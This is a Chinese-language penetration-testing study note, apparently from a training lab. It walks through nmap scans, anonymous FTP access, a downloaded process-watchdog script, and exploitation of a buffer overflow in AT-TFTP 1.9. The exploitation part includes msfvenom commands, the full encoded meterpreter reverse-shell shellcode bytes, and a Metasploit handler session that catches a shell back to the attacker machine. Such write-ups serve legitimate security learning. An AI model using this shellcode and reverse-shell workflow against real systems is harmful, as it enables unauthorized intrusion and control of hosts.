渗透测试学习笔记之案例五
程序员文章站
2022-06-12 15:24:25
...
0x00 前言
今天这篇文章主要来分享一个在渗透测试过程中如何通过逐步收集信息并最终拿下目标主机的案例。
0x01 案例分析
实验环境:
- 目标靶机:10.11.1.0/24
- 攻击机:Kali Linux(10.11.0.74)
渗透过程:
首先进行服务和端口扫描,如下:
# nmap -sT -Pn 10.11.1.226
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:35 CST
Nmap scan report for 10.11.1.226
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp open ftp
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 35.58 seconds# ftp 10.11.1.226
Connected to 10.11.1.226.
220-exploitme
220 Please enter your name:
Name (10.11.1.226:root): anonymous
331 User name okay, Need password.
Password:
230 User logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (468 bytes).
-rwxrw-rw- 1 root root 0 Dec 24 2009 AUTOEXEC.BAT
-rwxrw-rw- 1 root root 0 Dec 24 2009 CONFIG.SYS
drwxrw-rw- 1 root root 0 Sep 19 2011 Documents and Settings
drwxrw-rw- 1 root root 0 Dec 24 2009 ftproot
drwxrw-rw- 1 root root 0 Dec 27 2012 Program Files
drwxrw-rw- 1 root root 0 Jun 16 2016 Python26
drwxrw-rw- 1 root root 0 Apr 20 2016 WINDOWS
drwxrw-rw- 1 root root 0 Dec 24 2009 wmpub
226 Transfer successful.
ftp> cd "Documents and Settings"
250 "/Documents and Settings" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (108 bytes).
drwxrw-rw- 1 root root 0 Dec 24 2009 All Users
drwxrw-rw- 1 root root 0 Aug 18 2015 joe
226 Transfer successful.
ftp> cd joe
250 "/Documents and Settings/joe" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (401 bytes).
drwxrw-rw- 1 root root 0 Aug 18 2015 .idlerc
drwxrw-rw- 1 root root 0 Dec 24 2009 Cookies
drwxrw-rw- 1 root root 0 Aug 18 2015 Desktop
drwxrw-rw- 1 root root 0 Sep 19 2011 Favorites
drwxrw-rw- 1 root root 0 Sep 19 2011 My Documents
drwxrw-rw- 1 root root 0 Dec 23 2009 Start Menu
-rwxrw-rw- 1 root root 0 Dec 23 2009 Sti_Trace.log
226 Transfer successful.
ftp> cd Desktop
250 "/Documents and Settings/joe/Desktop" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (130 bytes).
-rwxrw-rw- 1 root root 694 Dec 24 2009 GuildFTPd FTP Deamon.lnk
-rwxrw-rw- 1 root root 2417 Dec 8 2015 servers.py
226 Transfer successful.
ftp> cat servers.py
?Invalid command
ftp> type servers.py
servers.py: unknown mode
ftp> get servers.py
local: servers.py remote: servers.py
200 PORT command successful.
150 Opening binary mode data connection for /Documents and Settings/joe/Desktop/servers.py (2417 bytes).
226 Transfer complete. 2417 bytes in 1 sec. (2.42 Kb/s).
2417 bytes received in 0.01 secs (413.8064 kB/s)
ftp># cat servers.py
import wmi, time, ftplib, tftpy
print "[*] Start"
print ""
def isFTPworking():
print "[*] Checking FTP connection..."
try:
ftp = ftplib.FTP('10.11.1.226', timeout=5)
ftp.login()
except:
print "[!] FTP not working!!"
return False
print "[*] FTP is working."
return True
def isTFTPworking():
print "[*] Checking TFTP connection..."
try:
tftp = tftpy.TftpClient('10.11.1.226', 69)
tftp.download("C:/windows/temp/test.txt","C:/windows/temp/test2.txt")
except:
print "[!] TFTP not working!!"
return False
print "[*] TFTP is working."
return True
def killProcess(processname):
print "[*] Killing process: " + processname
try:
c = wmi.WMI()
for process in c.Win32_Process():
if process.Name == processname:
process.Terminate()
except:
print "[!] Exception while killing process"
return True
def startProcess(processpath):
print "[*] Creating process: " + processpath
try:
c = wmi.WMI()
pid, result = c.Win32_Process.Create(processpath)
except IOError:
print "[*] Exception while creating process " + processpath
return
def isProcessAlive(processname):
print "[*] Checking process: " + processname
check = False
try:
c = wmi.WMI()
for process in c.Win32_Process():
if process.Name == processname:
check = True
if not check:
return False
except:
print "[!] Exception while using wmi interface"
return True
if __name__ == '__main__':
ftpproc = 'GuildFTPd.exe'
tftpproc = 'tftpd.exe'
processes = {'GuildFTPd.exe': r'"C:\\Program Files\\GuildFTPd\\GuildFTPd.exe"',
'tftpd.exe': r'"C:\\Program Files\\Allied Telesyn\\AT-TFTP Server 1.9\\tftpd.exe"'}
while True:
for processname in processes.keys():
if not isProcessAlive(processname):
startProcess(processes[processname])
if not isFTPworking():
killProcess(ftpproc)
time.sleep(5)
startProcess(processes[ftpproc])
if not isTFTPworking():
killProcess(tftpproc)
time.sleep(5)
startProcess(processes[tftpproc])
time.sleep(30)# nmap -sU -Pn -p 69 10.11.1.226
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:44 CST
Nmap scan report for 10.11.1.226
Host is up (0.12s latency).
PORT STATE SERVICE
69/udp open tftp
MAC Address: 00:50:56:89:7B:69 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.54 secondsGoogle搜索发现AT-TFTP 1.9存在一个缓冲区溢出的RCE漏洞:<https://github.com/brianwrf/cve-2006-6184>
于是,利用下面的步骤生成meterpreter的反弹shell的shellcode,并替换利用脚本atftp.py中相应的shellcode代码:
# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.74 LPORT=4444 R > payload
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 177 bytes
# cat stackadj payload > shellcode
# cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f python
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 210 (iteration=0)
x86/shikata_ga_nai chosen with final size 210
Payload size: 210 bytes
Final size of python file: 1020 bytes
buf = ""
buf += "\xdd\xc1\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x2e\xbf\x13"
buf += "\x73\xb1\x20\x31\x78\x1a\x03\x78\x1a\x83\xe8\xfc\xe2"
buf += "\xe6\xf2\x5d\x8c\x05\xf5\x9d\x31\x7f\x1e\xda\x21\x86"
buf += "\x1f\x1a\x4e\x18\xd1\x3e\x3a\xa5\x2d\x4a\x41\x68\x36"
buf += "\x4d\x55\x19\x91\x6d\xa8\xf7\x95\x5a\x30\x06\x44\x93"
buf += "\x84\x91\x34\x15\xce\xac\x45\x54\x4b\x6e\x30\xae\x17"
buf += "\x08\x82\x84\xed\x37\xbf\x93\x41\x93\x41\x4d\x3b\x50"
buf += "\x5d\xd4\x4f\x29\x42\xe7\xa6\xb6\x56\x7e\xb1\xd4\x82"
buf += "\x9c\xa3\xdb\x2b\xad\xf8\x47\x27\x8d\xce\x0c\x77\x1e"
buf += "\xa4\x62\x64\xb3\x31\xea\x9c\x95\x23\xb9\xfa\x41\x9f"
buf += "\x0f\x6b\xe5\xac\x5d\x34\x5d\x35\x18\xb8\x3d\x46\x8c"
buf += "\xa8\xed\xeb\x63\x80\x52\x5f\xc0\x75\xdc\xb8\xa0\xf8"
buf += "\x31\x4e\x2e\xac\x9e\x29\x97\xb5\xfe\x49\x31\x5f\xb8"
buf += "\x1e\xd2\x5f\x6c\xc9\x44\xaa\x9a\xf6\xde\xcc\xf4\xe7"
buf += "\x82\x76\x56\x81\xd9\x1d\x48\xc2\x4a\x84\xd1\xb3\x71"
buf += "\xb7\xf4\x6c\xcd\x4b\xa9\xdf\x7a\x07\x2f\x59\x44\x9f"
buf += "\x50\x7f"开启MSF的监听,并执行利用脚本。
# python atftp.py 10.11.1.226 69 10.11.0.74 9msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_nonx_tcp
payload => windows/meterpreter/reverse_nonx_tcp
msf exploit(handler) > set LHOST 10.11.0.74
LHOST => 10.11.0.74
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.11.0.74:4444
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (171583 bytes) to 10.11.1.226
[*] Meterpreter session 1 opened (10.11.0.74:4444 -> 10.11.1.226:1144) at 2017-09-10 03:57:12 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows JOE\joe @ JOE 10.11.0.74:4444 -> 10.11.1.226:1144 (10.11.1.226)0x02 小结
总结一下该案例的渗透思路如下:
- 首先进行服务和端口扫描
- 接着检测到ftp可匿名登录并进一步发现有价值的脚本文件
- 猜测并验证目标系统开启了有漏洞的tftp服务
- 修改漏洞利用代码并尝试利用
- 最终获得反弹shell并成功提权
下一篇: 岛屿数量(BFS广度优先搜索:队列)